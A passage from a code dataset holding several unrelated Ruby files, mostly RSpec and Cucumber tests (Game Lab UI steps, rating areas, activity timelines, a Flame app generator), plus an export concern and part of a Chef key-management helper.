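#     And I append gamelab code to draw a ninja
#     And I press run
#     Then I do not see "Error" in the Game Lab console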
When /^I (?:reset the game|press reset)$/ do
steps 'And I press "resetButton"'
end
When /^I switch to(?: the)? animation (?:mode|tab)$/ do
steps 'When I press "animationMode"'
end
When /^I switch to(?: the)? code (?:mode|tab) in Game Lab$/ do
@browser.execute_script("$(\"#codeMode\")[0].click();")
end
Then /^I do not see "([^"]*)" in the Game Lab console$/ do |message|
expect(element_contains_text?('#debug-output', message)).to be false
end
Then /^I see (\d+) animations in the animation column$/ do |num_animations|
expect(@browser.execute_script('return $(".animationList>div>div").not(".newListItem").length')).to eq num_animations.to_i
end
Then /^I open the animation picker$/ do
@browser.execute_script("$(\".newListItem\")[0].click();")
end
Then /^I select a blank animation$/ do
@browser.execute_script("$(\".uitest-animation-picker-item\")[0].click();")
end
Then /^I select the animal category of the animation library$/ do
wait_until {@browser.execute_script("return $(\"img[src*='/category_animals.png']\").length != 0;")}
@browser.execute_script("$(\"img[src*='/category_animals.png']\")[1].click();")
end
Then /^I select the bear animal head animation from the animal category$/ do
wait_until {@browser.execute_script("return $(\"img[src*='/category_animals/animalhead_bear.png']\").length != 0;")}
@browser.execute_script("$(\"img[src*='/category_animals/animalhead_bear.png']\")[0].click();")
end
Then /^I add a new, blank animation$/ do
steps <<-STEPS
And I open the animation picker
And I select a blank animation
STEPS
end
Then /^I add the bear animal head animation from the library$/ do
steps <<-STEPS
And I open the animation picker
And I select the animal category of the animation library
And I select the bear animal head animation from the animal category
STEPS
end
Then /^I append gamelab code to draw a ninja$/ do
code = <<CODE.gsub(/\n/, '\\n')
function draw() {
noStroke();
// Feet
fill('black');
ellipse(190, 350, 30, 30);
ellipse(210, 350, 30, 30);
// Hands
fill('black');
ellipse(145, 310, 30, 30);
ellipse(260, 300, 30, 30);
// Body
fill('white');
ellipse(200, 300, 110, 110);
fill('black');
ellipse(200, 300, 100, 100);
// Head
fill('white');
ellipse(200, 180, 210, 210);
fill('black');
ellipse(200, 180, 200, 200);
fill('white');
rect(0, 170, 400, 50);
fill('black');
ellipse(150, 195, 30, 40);
ellipse(250, 195, 30, 40);
fill('white');
ellipse(155, 190, 6, 8);
ellipse(255, 190, 6, 8);
}
CODE
script = <<SCRIPT
var aceEditor = __TestInterface.getDroplet().aceEditor;
aceEditor.navigateFileEnd();
aceEditor.textInput.focus();
aceEditor.onTextInput(\"#{code}\");
SCRIPT
@browser.execute_script(script)
end
| 28.430769 | 124 | 0.676948 |
01364a3a6ba8532facd2d007eb048eb7100381df | 1,032 | # encoding: utf-8
require File.dirname(__FILE__) + '/../spec_helper'
require File.dirname(__FILE__) + '/fixtures/classes'
ruby_version_is '1.8.7' do
describe "IO#bytes" do
before :each do
@original = $KCODE
$KCODE = "UTF-8"
@io = File.open(IOSpecs.gets_fixtures)
end
after :each do
@io.close unless @io.closed?
$KCODE = @original
end
it "returns an enumerator of the next bytes from the stream" do
enum = @io.bytes
enum.should be_kind_of(enumerator_class)
@io.readline.should == "Voici la ligne une.\n"
enum.first(5).should == [81, 117, 105, 32, 195]
end
it "ignores a block" do
@io.bytes{ raise "oups" }.should be_kind_of(enumerator_class)
end
it "raises IOError on closed stream" do
enum = IOSpecs.closed_file.bytes
lambda { enum.first }.should raise_error(IOError)
enum = @io.bytes
enum.first.should == 86
@io.close
lambda { enum.first }.should raise_error(IOError)
end
end
end
| 26.461538 | 67 | 0.630814 |
386c45426796899ff46b465482c6c9ffc0323f22 | 4,569 | require 'rails_helper'
module BenefitMarkets
RSpec.describe Locations::RatingArea do
describe "given nothing" do
before :each do
subject.valid?
end
it "requires an active year" do
expect(subject.errors.has_key?(:active_year)).to be_truthy
end
it "requires an exchange provided code" do
expect(subject.errors.has_key?(:exchange_provided_code)).to be_truthy
end
it "requires a geographic boundry to be specified" do
expect(subject.errors[:base]).to include("a location covered by the rating area must be specified")
end
end
describe "which covers the entire administrative area" do
subject { Locations::RatingArea.new(covered_states: ["MA"]) }
before :each do
subject.valid?
end
it "is satisfied location has been provided" do
expect(subject.errors[:base]).not_to include("a location covered by the rating area must be specified")
end
end
describe "given a county zip pair" do
subject { Locations::RatingArea.new(county_zip_ids: [BSON::ObjectId.new]) }
before :each do
subject.valid?
end
it "is satisfied location has been provided" do
expect(subject.errors[:base]).not_to include("a location covered by the rating area must be specified")
end
end
describe "created for a given zip code and county in a state", :dbclean => :after_each do
let(:county_zip) { ::BenefitMarkets::Locations::CountyZip.create!(county_name: "Hampshire", zip: "01001", state: "MA") }
let(:rating_area) { ::BenefitMarkets::Locations::RatingArea.create!(active_year: TimeKeeper.date_of_record.year, county_zip_ids: [county_zip.id], exchange_provided_code: "MA0") }
let(:address_outside_county) {
OpenStruct.new(
:zip => "01001",
:county => "Baltimore",
:state => "MA"
)
}
let(:address_outside_zip) {
OpenStruct.new(
:zip => "01555",
:county => "Hampshire",
:state => "MA"
)
}
let(:address_outside_state) {
OpenStruct.new(
:zip => "01001",
:county => "Hampshire",
:state => "MD"
)
}
let(:matching_address) {
OpenStruct.new(
:zip => "01001",
:county => "Hampshire",
:state => "MA"
)
}
it "will not be found when given an address not in that county" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(address_outside_county)
expect(rating_areas.to_a).not_to include(rating_area)
end
it "will not be found when given an address not in that zip code" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(address_outside_zip)
expect(rating_areas.to_a).not_to include(rating_area)
end
it "will not be found when given an address not in that state" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(address_outside_state)
expect(rating_areas.to_a).not_to include(rating_area)
end
it "is found when a matching address is provided" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(matching_address)
expect(rating_areas.to_a).to include(rating_area)
end
end
describe "created for a given state", :dbclean => :after_each do
let(:rating_area) { ::BenefitMarkets::Locations::RatingArea.create!(active_year: TimeKeeper.date_of_record.year, covered_states: ["MA"], exchange_provided_code: "MA0") }
let(:address_outside_state) {
OpenStruct.new(
:zip => "01001",
:county => "Hampshire",
:state => "MD"
)
}
let(:matching_address) {
OpenStruct.new(
:zip => "01001",
:county => "Hampshire",
:state => "MA"
)
}
it "will not be found when given an address not in that state" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(address_outside_state)
expect(rating_areas.to_a).not_to include(rating_area)
end
it "is found when a matching address is provided" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(matching_address)
expect(rating_areas.to_a).to include(rating_area)
end
end
end
end
| 33.350365 | 184 | 0.634274 |
aca12beaefc4341889576d0cb2fbc3ade931bba8 | 1,727 | # frozen_string_literal: true
module Exportable
extend ActiveSupport::Concern
included do
include Redis::Objects
has_one_attached :pdf, dependent: false
value :export_pdf_status
has_one_attached :archive, dependent: false
value :export_archive_status
end
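  # Usage sketch (the Doc record and lookup below are assumptions for illustration):
  #
  #   doc = Doc.first
  #   doc.export(:pdf)          # enqueues PDFExportJob and sets export_pdf_status to "running"
  #   doc.export_status(:pdf)   # => "running" until the job calls update_export!
  #   doc.export_url(:pdf)      # => "#{Setting.host}/uploads/<key>" once the PDF is attached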
def export(type)
type = type.to_sym
set_export_status(type, "running")
if type == :pdf
PDFExportJob.perform_later(self)
elsif type == :archive
ArchiveExportJob.perform_later(self)
end
end
def export_url(type)
type = type.to_sym
return nil unless send(type).attached?
if type == :pdf
"#{Setting.host}/uploads/#{pdf.blob.key}"
elsif type == :archive
"#{Setting.host}/uploads/#{archive.blob.key}"
end
end
def export_filename(type)
type = type.to_sym
fname = case self.class.name
when "Doc"
title
when "Repository"
name
when "Note"
title
else
"bluedoc-export"
end
if type == :pdf
BlueDoc::Slug.filenameize("#{fname}.pdf")
elsif type == :archive
BlueDoc::Slug.filenameize("#{fname}.zip")
end
end
def set_export_status(type, value)
type = type.to_sym
if type == :pdf
self.export_pdf_status = value
elsif type == :archive
self.export_archive_status = value
end
end
def export_status(type)
type = type.to_sym
if type == :pdf
export_pdf_status
elsif type == :archive
export_archive_status
end
end
def update_export!(type, io)
type = type.to_sym
return nil if io.blank?
send(type).attach(io: io, filename: export_filename(type))
save!
end
end
| 20.807229 | 62 | 0.62073 |
f7b110a024a8b7e813176faba8fa069e931fbee7 | 5,384 | # frozen_string_literal: true
require 'pathname'
require 'net/http'
describe 'FlameCLI::New::App' do
let(:app_name) { 'foo_bar' }
subject(:execute_command) do
`#{FLAME_CLI} new app #{app_name}`
end
let(:template_dir) { File.join(__dir__, '../../../template') }
let(:template_dir_pathname) { Pathname.new(template_dir) }
let(:template_ext) { '.erb' }
after do
FileUtils.rm_r File.join(__dir__, '../../..', app_name)
end
describe 'output' do
it do
is_expected.to match_words(
"Creating '#{app_name}' directory...",
'Copy template directories and files...',
'Clean directories...',
'Replace module names in template...',
'- config.ru',
'- application.rb',
'- config/config.rb',
'- config/sequel.rb',
'- controllers/_controller.rb',
'- controllers/site/_controller.rb',
'- controllers/site/index_controller.rb',
'Grant permissions to files...',
'Done!'
)
end
end
describe 'creates root directory with received app name' do
subject { Dir.exist?(app_name) }
before { execute_command }
it { is_expected.to be true }
end
describe 'copies template directories and files into app root directory' do
before { execute_command }
let(:files) do
Dir[File.join(template_dir, '**/*')]
.map do |filename|
filename_pathname = Pathname.new(filename)
.relative_path_from(template_dir_pathname)
next if File.dirname(filename).split(File::SEPARATOR).include? 'views'
if filename_pathname.extname == template_ext
filename_pathname = filename_pathname.sub_ext('')
end
File.join app_name, filename_pathname
end
.compact
end
subject { File }
it { files.each { |file| is_expected.to exist file } }
end
describe 'cleans directories' do
before { execute_command }
subject { Dir[File.join(app_name, '**/.keep')] }
it { is_expected.to be_empty }
end
describe 'renders app name in files' do
before { execute_command }
subject { File.read File.join(app_name, *path_parts) }
describe 'config.ru' do
let(:path_parts) { 'config.ru' }
it do
is_expected.to match_words(
'use Rack::Session::Cookie, FB::Application.config[:session][:cookie]',
'FB::Application.config[:server][environment.to_s][:logs_dir]',
'FB::Application.config[:logger] = Logger.new',
'FB::DB.loggers <<',
'FB.logger',
'FB::DB.freeze',
'run FB::Application'
)
end
end
describe 'application.rb' do
let(:path_parts) { 'application.rb' }
it do
is_expected.to match_words(
'module FooBar',
'include FB::Config'
)
end
end
describe 'controllers/_controller.rb' do
let(:path_parts) { ['controllers', '_controller.rb'] }
it do
is_expected.to match_words(
'module FooBar',
'FB.logger'
)
end
end
describe 'controllers/site/_controller.rb' do
let(:path_parts) { ['controllers', 'site', '_controller.rb'] }
it do
is_expected.to match_words(
'module FooBar',
'class Controller < FB::Controller'
)
end
end
describe 'controllers/site/index_controller.rb' do
let(:path_parts) { ['controllers', 'site', 'index_controller.rb'] }
it do
is_expected.to match_words(
'module FooBar',
'class IndexController < FB::Site::Controller'
)
end
end
describe 'config/config.rb' do
let(:path_parts) { ['config', 'config.rb'] }
it do
is_expected.to match_words(
'module FooBar',
"SITE_NAME = 'FooBar'",
"ORGANIZATION_NAME = 'FooBar LLC'",
'::FB = ::FooBar',
'FB::Application.config[:logger]'
)
end
end
describe 'config/sequel.rb' do
let(:path_parts) { ['config', 'sequel.rb'] }
it do
is_expected.to match_words(
'module FooBar'
)
end
end
end
describe 'generates working app' do
before do
ENV['RACK_ENV'] = 'development'
execute_command
Dir.chdir app_name
## HACK for new unreleased features
File.write(
'Gemfile',
File.read('Gemfile').sub(
"gem 'flame', github: 'AlexWayfer/flame'\n", "gem 'flame', path: '..'\n"
)
)
%w[server].each do |config|
FileUtils.cp "config/#{config}.example.yml", "config/#{config}.yml"
end
## HACK for testing while some server is running
File.write(
'config/server.yml',
File.read('config/server.yml').sub('port: 3000', "port: #{port}")
)
system 'bundle install --gemfile=Gemfile'
end
let(:port) { 3456 }
subject do
begin
pid = spawn './server start'
number_of_attempts = 0
begin
number_of_attempts += 1
response = Net::HTTP.get URI("http://localhost:#{port}/")
rescue Errno::ECONNREFUSED => e
sleep 1
retry if number_of_attempts < 10
raise e
end
response
ensure
`./server stop`
Process.wait pid
end
end
after do
Dir.chdir '..'
end
it do
is_expected.to eq <<~RESPONSE
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>FooBar</title>
</head>
<body>
<h1>Hello, world!</h1>
</body>
</html>
RESPONSE
end
end
describe 'grants `./server` file execution permissions' do
before do
execute_command
Dir.chdir app_name
end
after do
Dir.chdir '..'
end
subject { File.stat('server').mode.to_s(8)[3..5] }
it { is_expected.to eq '744' }
end
end
| 20.787645 | 77 | 0.628343 |
abbadd65b50ed3497c5c7281ae580599ee08e3e5 | 16,368 | require File.join(File.dirname(__FILE__), 'spec_helper')
describe Activr::Storage do
let(:user) { User.create(:_id => 'jpale', :first_name => "Jean", :last_name => "PALE") }
let(:picture) { Picture.create(:title => "Me myself and I") }
let(:album) { Album.create(:name => "Selfies") }
let(:owner) { User.create(:_id => 'corinne', :first_name => "Corinne", :last_name => "CHTITEGOUTE") }
let(:buddy) { User.create(:_id => 'justine', :first_name => "Justine", :last_name => "CHTITEGOUTE") }
let(:follower) { User.create(:_id => 'anne', :first_name => "Anne", :last_name => "CHTITEGOUTE") }
after(:each) do
Activr.storage.clear_hooks!
end
it "detects a valid document id" do
str_doc_id = "51a5bb06b7b95d7282000005"
Activr.storage.valid_id?(str_doc_id).should be_true
doc_id = if defined?(::Moped::BSON)
::Moped::BSON::ObjectId(str_doc_id)
elsif defined?(::BSON::ObjectId)
::BSON::ObjectId.from_string(str_doc_id)
else
str_doc_id
end
Activr.storage.valid_id?(doc_id).should be_true
end
it "detects an invalid document id" do
Activr.storage.valid_id?(Hash.new).should be_false
end
it "detects a serialized document id" do
doc_id = { '$oid' => '51a5bb06b7b95d7282000005' }
Activr.storage.serialized_id?(doc_id).should be_true
end
it "detects a not serialized document id" do
doc_id = '51a5bb06b7b95d7282000005'
Activr.storage.serialized_id?(doc_id).should be_false
end
it "unserialize a document id" do
hash_doc_id = { '$oid' => '51a5bb06b7b95d7282000005' }
doc_id = Activr.storage.unserialize_id(hash_doc_id)
Activr.storage.valid_id?(doc_id).should be_true
end
#
# Activities
#
it "inserts an activity" do
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
doc_id = Activr.storage.insert_activity(activity)
Activr.storage.valid_id?(doc_id).should be_true
end
it "finds an activity by id" do
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
doc_id = Activr.storage.insert_activity(activity)
fetched_activity = Activr.storage.find_activity(doc_id)
fetched_activity.should_not be_nil
fetched_activity._id.should == doc_id
end
context "with stored activities" do
before(:each) do
@activity_1 = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
@activity_1.store!
Delorean.jump(30)
@activity_2 = FollowAlbumActivity.new(:actor => user, :album => album)
@activity_2.store!
end
it "finds activities" do
Activr.storage.find_activities(10).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
end
it "counts activities" do
Activr.storage.count_activities.should == 2
end
it "finds activities filtered with :only option" do
Activr.storage.find_activities(10, :only => AddPictureActivity).map(&:_id).should == [ @activity_1._id ]
Activr.storage.find_activities(10, :only => FollowAlbumActivity).map(&:_id).should == [ @activity_2._id ]
Activr.storage.find_activities(10, :only => LikePictureActivity).should == [ ]
Activr.storage.find_activities(10, :only => [ AddPictureActivity, FollowAlbumActivity ]).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
Activr.storage.find_activities(10, :only => [ AddPictureActivity, LikePictureActivity ]).map(&:_id).should == [ @activity_1._id ]
end
it "counts activities filtered with :only option" do
Activr.storage.count_activities(:only => AddPictureActivity).should == 1
Activr.storage.count_activities(:only => FollowAlbumActivity).should == 1
Activr.storage.count_activities(:only => LikePictureActivity).should == 0
Activr.storage.count_activities(:only => [ AddPictureActivity, FollowAlbumActivity ]).should == 2
Activr.storage.count_activities(:only => [ AddPictureActivity, LikePictureActivity ]).should == 1
end
it "find activities with :entities option" do
Activr.storage.find_activities(10, :entities => { :actor => user._id }).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
Activr.storage.find_activities(10, :entities => { :picture => picture._id }).map(&:_id).should == [ @activity_1._id ]
Activr.storage.find_activities(10, :entities => { :album => album._id }).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
Activr.storage.find_activities(10, :entities => {:actor => user._id, :album => album._id }).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
Activr.storage.find_activities(10, :entities => {:actor => user._id, :picture => picture._id, :album => album._id }).map(&:_id).should == [ @activity_1._id ]
end
it "counts activities filtered with :only option" do
Activr.storage.count_activities(:entities => { :actor => user._id }).should == 2
Activr.storage.count_activities(:entities => { :picture => picture._id }).should == 1
Activr.storage.count_activities(:entities => { :album => album._id }).should == 2
Activr.storage.count_activities(:entities => {:actor => user._id, :album => album._id }).should == 2
Activr.storage.count_activities(:entities => {:actor => user._id, :picture => picture._id, :album => album._id }).should == 1
end
it "deletes activities referring to an entity model instance" do
Activr.storage.delete_activities_for_entity_model(picture)
# check
Activr.storage.find_activities(10).map(&:_id).should == [ @activity_2._id ]
Activr.storage.delete_activities_for_entity_model(user)
# check
Activr.storage.find_activities(10).map(&:_id).should == [ ]
end
end
it "counts duplicate activities" do
AddPictureActivity.new(:actor => user, :picture => picture, :album => album).store!
Delorean.jump(10)
FollowAlbumActivity.new(:actor => user, :album => album).store!
Delorean.jump(10)
AddPictureActivity.new(:actor => user, :picture => picture, :album => album).store!
Delorean.jump(10)
AddPictureActivity.new(:actor => user, :picture => picture, :album => album).store!
Delorean.jump(10)
# check
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
Activr.storage.count_duplicate_activities(activity, Time.now.utc - 45).should == 3
Activr.storage.count_duplicate_activities(activity, Time.now.utc - 35).should == 2
Activr.storage.count_duplicate_activities(activity, Time.now.utc - 15).should == 1
Activr.storage.count_duplicate_activities(activity, Time.now.utc - 5).should == 0
end
#
# Timelines
#
it "inserts a timeline entry" do
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
activity.store!
timeline = UserNewsFeedTimeline.new(owner)
timeline_entry = Activr::Timeline::Entry.new(timeline, 'album_owner', activity)
doc_id = Activr.storage.insert_timeline_entry(timeline_entry)
doc_id.should_not be_nil
end
it "finds a timeline entry by id" do
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
activity.store!
timeline = UserNewsFeedTimeline.new(owner)
timeline_entry = Activr::Timeline::Entry.new(timeline, 'album_owner', activity)
doc_id = Activr.storage.insert_timeline_entry(timeline_entry)
fetched_tl_entry = Activr.storage.find_timeline_entry(timeline, doc_id)
fetched_tl_entry.should_not be_nil
fetched_tl_entry._id.should == doc_id
end
context "with stored timelines entries" do
before(:each) do
@timeline = UserNewsFeedTimeline.new(owner)
@activity_1 = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
@activity_1.store!
@timeline_entry_1 = Activr::Timeline::Entry.new(@timeline, 'album_owner', @activity_1)
@timeline_entry_1.store!
Delorean.jump(30)
@activity_2 = FollowAlbumActivity.new(:actor => user, :album => album)
@activity_2.store!
@timeline_entry_2 = Activr::Timeline::Entry.new(@timeline, 'my_custom_routing', @activity_2)
@timeline_entry_2.store!
end
it "finds timeline entries" do
Activr.storage.find_timeline(@timeline, 10).map(&:_id).should == [ @timeline_entry_2._id, @timeline_entry_1._id ]
end
it "counts timeline entries" do
Activr.storage.count_timeline(@timeline).should == 2
end
it "finds timeline entries filtered with :only option" do
route = @timeline.route_for_routing_and_activity('my_custom_routing', FollowAlbumActivity)
route.should_not be_nil
Activr.storage.find_timeline(@timeline, 10, :only => route).map(&:_id).should == [ @timeline_entry_2._id ]
route = @timeline.route_for_routing_and_activity('album_owner', AddPictureActivity)
route.should_not be_nil
Activr.storage.find_timeline(@timeline, 10, :only => route).map(&:_id).should == [ @timeline_entry_1._id ]
route = @timeline.route_for_routing_and_activity('picture_owner', LikePictureActivity)
route.should_not be_nil
Activr.storage.find_timeline(@timeline, 10, :only => route).should == [ ]
end
it "counts timeline entries filtered with :only option" do
route = @timeline.route_for_routing_and_activity('my_custom_routing', FollowAlbumActivity)
route.should_not be_nil
Activr.storage.count_timeline(@timeline, :only => route).should == 1
route = @timeline.route_for_routing_and_activity('album_owner', AddPictureActivity)
route.should_not be_nil
Activr.storage.count_timeline(@timeline, :only => route).should == 1
route = @timeline.route_for_routing_and_activity('picture_owner', LikePictureActivity)
route.should_not be_nil
Activr.storage.count_timeline(@timeline, :only => route).should == 0
end
it "deletes all timeline entries" do
timeline_2 = UserNewsFeedTimeline.new(buddy)
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_1).store!
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_2).store!
Activr.storage.count_timeline(@timeline).should == 2
Activr.storage.count_timeline(timeline_2).should == 2
# test
Activr.storage.delete_timeline(@timeline)
# check
Activr.storage.count_timeline(@timeline).should == 0
Activr.storage.count_timeline(timeline_2).should == 2
# test
Activr.storage.delete_timeline(timeline_2)
# check
Activr.storage.count_timeline(@timeline).should == 0
Activr.storage.count_timeline(timeline_2).should == 0
end
it "deletes timeline entries with :before option" do
timeline_2 = UserNewsFeedTimeline.new(buddy)
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_1).store!
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_2).store!
Activr.storage.count_timeline(@timeline).should == 2
# test
Activr.storage.delete_timeline(@timeline, :before => (Time.now.utc - 45))
# check
Activr.storage.count_timeline(@timeline).should == 2
# test
Activr.storage.delete_timeline(@timeline, :before => (Time.now.utc - 15))
# check
Activr.storage.count_timeline(@timeline).should == 1
# test
Delorean.jump(30)
Activr.storage.delete_timeline(@timeline, :before => (Time.now.utc - 15))
# check
Activr.storage.count_timeline(@timeline).should == 0
Activr.storage.count_timeline(timeline_2).should == 2
end
it "deletes timeline entries with :entities option" do
timeline_2 = UserNewsFeedTimeline.new(buddy)
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_1).store!
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_2).store!
Activr.storage.count_timeline(@timeline).should == 2
# test
Activr.storage.delete_timeline(@timeline, :entities => { :picture => picture._id, :album => album._id })
# check
Activr.storage.count_timeline(@timeline).should == 1
# test
Activr.storage.delete_timeline(@timeline, :entities => { :actor => user._id })
# check
Activr.storage.count_timeline(@timeline).should == 0
Activr.storage.count_timeline(timeline_2).should == 2
end
it "deletes timeline entries referring to an entity model instance" do
Activr.storage.delete_timeline_entries_for_entity_model(picture)
# check
Activr.storage.find_timeline(@timeline, 10).map(&:_id).should == [ @timeline_entry_2._id ]
Activr.storage.delete_timeline_entries_for_entity_model(user)
# check
Activr.storage.find_timeline(@timeline, 10).map(&:_id).should == [ ]
end
end
#
# Hooks
#
it "runs :will_insert_activity hook" do
Activr.storage.will_insert_activity do |activity_hash|
activity_hash['foo'] = 'bar'
end
Activr.storage.will_insert_activity do |activity_hash|
activity_hash['meta'] ||= { }
activity_hash['meta']['bar'] = 'baz'
end
# test
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
activity.store!
activity_hash = Activr.storage.driver.find_activity(activity._id)
activity_hash.should_not be_nil
activity_hash['foo'].should == 'bar'
activity_hash['meta'].should == {
'bar' => 'baz',
}
fetched_activity = Activr.storage.find_activity(activity._id)
fetched_activity[:foo].should == 'bar'
fetched_activity[:bar].should == 'baz'
end
it "runs :did_find_activity hook" do
Activr.storage.did_find_activity do |activity_hash|
activity_hash['foo'] = 'bar'
end
Activr.storage.did_find_activity do |activity_hash|
activity_hash['meta'] ||= { }
activity_hash['meta']['bar'] = 'baz'
end
# test
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
activity.store!
# check
activity_hash = Activr.storage.driver.find_activity(activity._id)
activity_hash['foo'].should be_blank
activity_hash['meta'].should be_blank
fetched_activity = Activr.storage.find_activity(activity._id)
fetched_activity[:foo].should == 'bar'
fetched_activity[:bar].should == 'baz'
end
it "runs :will_insert_timeline_entry hook" do
Activr.storage.will_insert_timeline_entry do |timeline_entry_hash, timeline_class|
timeline_entry_hash['meta'] ||= { }
timeline_entry_hash['meta']['foo'] = 'bar'
end
Activr.storage.will_insert_timeline_entry do |timeline_entry_hash, timeline_class|
timeline_entry_hash['meta'] ||= { }
timeline_entry_hash['meta']['bar'] = 'baz'
end
# test
timeline = UserNewsFeedTimeline.new(owner)
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
timeline_entry = Activr::Timeline::Entry.new(timeline, 'album_owner_add_picture', activity)
timeline_entry.store!
# check
timeline_entry_hash = Activr.storage.driver.find_timeline_entry(timeline.kind, timeline_entry._id)
timeline_entry_hash['meta'].should == {
'foo' => 'bar',
'bar' => 'baz',
}
end
it "runs :did_find_timeline_entry hook" do
Activr.storage.did_find_timeline_entry do |timeline_entry_hash, timeline_class|
timeline_entry_hash['meta'] ||= { }
timeline_entry_hash['meta']['foo'] = 'bar'
end
Activr.storage.did_find_timeline_entry do |timeline_entry_hash, timeline_class|
timeline_entry_hash['meta'] ||= { }
timeline_entry_hash['meta']['bar'] = 'baz'
end
# test
timeline = UserNewsFeedTimeline.new(owner)
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
timeline_entry = Activr::Timeline::Entry.new(timeline, 'album_owner_add_picture', activity)
timeline_entry.store!
# check
fetched_tl_entry = Activr.storage.find_timeline_entry(timeline, timeline_entry._id)
fetched_tl_entry._id.should == timeline_entry._id
fetched_tl_entry[:foo].should == 'bar'
fetched_tl_entry[:bar].should == 'baz'
tl_entries = timeline.find(10)
tl_entries.first[:foo].should == 'bar'
tl_entries.first[:bar].should == 'baz'
end
end
| 36.61745 | 163 | 0.68695 |
e9ca9293ba81fab9c40fa6f413493eaa8c5eb214 | 1,276 | #######################################################
# tc_fetch.rb
#
# Test suite for the Array#fetch instance method.
#######################################################
require "test/unit"
class TC_Array_Fetch_Instance < Test::Unit::TestCase
def setup
@array = %w/a b c d/
end
def test_fetch_basic
assert_respond_to(@array, :fetch)
assert_nothing_raised{ @array.fetch(0) }
assert_nothing_raised{ @array.fetch(0, "a") }
assert_nothing_raised{ @array.fetch(0){ } }
end
def test_fetch_results
assert_equal("a", @array.fetch(0))
assert_equal("c", @array.fetch(2))
assert_equal("d", @array.fetch(-1))
assert_equal("c", @array.fetch(-2))
assert_equal("test", @array.fetch(99, "test"))
end
def test_fetch_with_block
assert_equal(8, @array.fetch(4){ |i| i * 2 })
assert_equal(-10, @array.fetch(-5){ |i| i * 2 })
assert_equal("test", @array.fetch(99){ "test" })
end
def test_fetch_expected_errors
assert_raises(ArgumentError){ @array.fetch }
assert_raises(ArgumentError){ @array.fetch{ "test" } }
assert_raises(IndexError){ @array.fetch(4) }
assert_raises(IndexError){ @array.fetch(-5) }
end
def teardown
@array = nil
end
end
| 28.355556 | 60 | 0.581505 |
796de892811f1589850e51ea24c6e4bd2408b379 | 6,225 | require "chef/config"
require "chef/key"
module ChefServerCtl
module Helpers
class KeyCtlHelper
def initialize
Chef::Config.from_file(ChefServerCtl::Config.knife_config_file)
end
# Optparse doesn't properly handle the case where you specify an argument with mandatory input
# and then pass another argument after it. It detects the second argument as input to the first argument.
#
# For example, if you have two arguments with mandatory input, --username NAME and
# --public-key-path PATH, defined in optparse, and you pass:
#
# cmd --username --public-key-path /etc/key
#
# It will detect the input to --username as --public-key-path and won't even detect --public-key-path as an argument.
      # This helper method takes a list of argument flags and checks that the input to a given argument
      # isn't actually another argument, throwing an error with a relevant message if so. This prevents
      # an argument with mandatory input from silently consuming the next argument as its input.
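      # Continuing the example above: for `cmd --username --public-key-path /etc/key`,
      # optparse hands "--public-key-path" to --username as its input, so a caller would run
      #   catch_argument_passed_as_input(['--public-key-path', '--key-name'], '--username', '--public-key-path')
      # (the argument list here is illustrative) and exit with
      # "Error: Missing valid input for argument --username." instead of mis-parsing.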
def catch_argument_passed_as_input(arg_list, arg, arg_input)
arg_list.each do |arg_element|
if arg_input.strip == arg_element
exit_failure(missing_input_msg(arg))
end
end
end
def exit_failure(msg)
STDERR.puts msg
raise SystemExit.new(1, msg)
end
def populate_client_key(clientname, name, public_key, expiration_date)
key = Chef::Key.new(clientname, "client")
populate_key_helper(key, name, public_key, expiration_date)
end
def populate_user_key(username, name, public_key, expiration_date)
key = Chef::Key.new(username, "user")
populate_key_helper(key, name, public_key, expiration_date)
end
def populate_key_helper(key, name, public_key, expiration_date)
key.name name
key.expiration_date expiration_date
if public_key
key.public_key public_key
else
key.create_key true
end
key
end
def check_valid_iso_date(expiration_date)
unless /^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z|infinity)$/.match(expiration_date)
exit_failure(invalid_date_msg)
end
end
def read_and_check_key(key_path)
begin
key = File.read(key_path)
rescue
exit_failure(public_key_path_msg)
end
unless /BEGIN (RSA |)PUBLIC KEY/.match(key)
exit_failure(not_a_public_key_msg)
end
key
end
def add_key_usage
<<EOS
Usage: If --public-key-path isn't passed, the server will generate a public key for you.
Usage: Expiration date defaults to infinity. Pass an ISO 8601 formatted string: YYYY-MM-DDTHH:MM:SSZ e.g. 2013-12-24T21:00:00Z in UTC timezone.
Usage: Default name used is the fingerprint of the key passed.
EOS
end
def parse_missing_arg_error(err)
arg = err.message.match(/(?<=missing argument:\s).*/)[0]
exit_failure(missing_valid_input_msg(arg))
end
def parse_invalid_arg_error(err)
arg = err.message.match(/(?<=invalid option:\s).*/)[0]
exit_failure(invalid_arg_msg(arg))
end
def exit_http_fail(err)
exit_failure("Error: An unexpected error has occured (the server returned a #{err.response.code}).\nError: Please contact a system admin if the problem persists.")
end
def get_required_arg!(options, args, usage, field_symbol, field_name, field_number)
field_value = nil
if args.nil? || args[field_number - 1].nil?
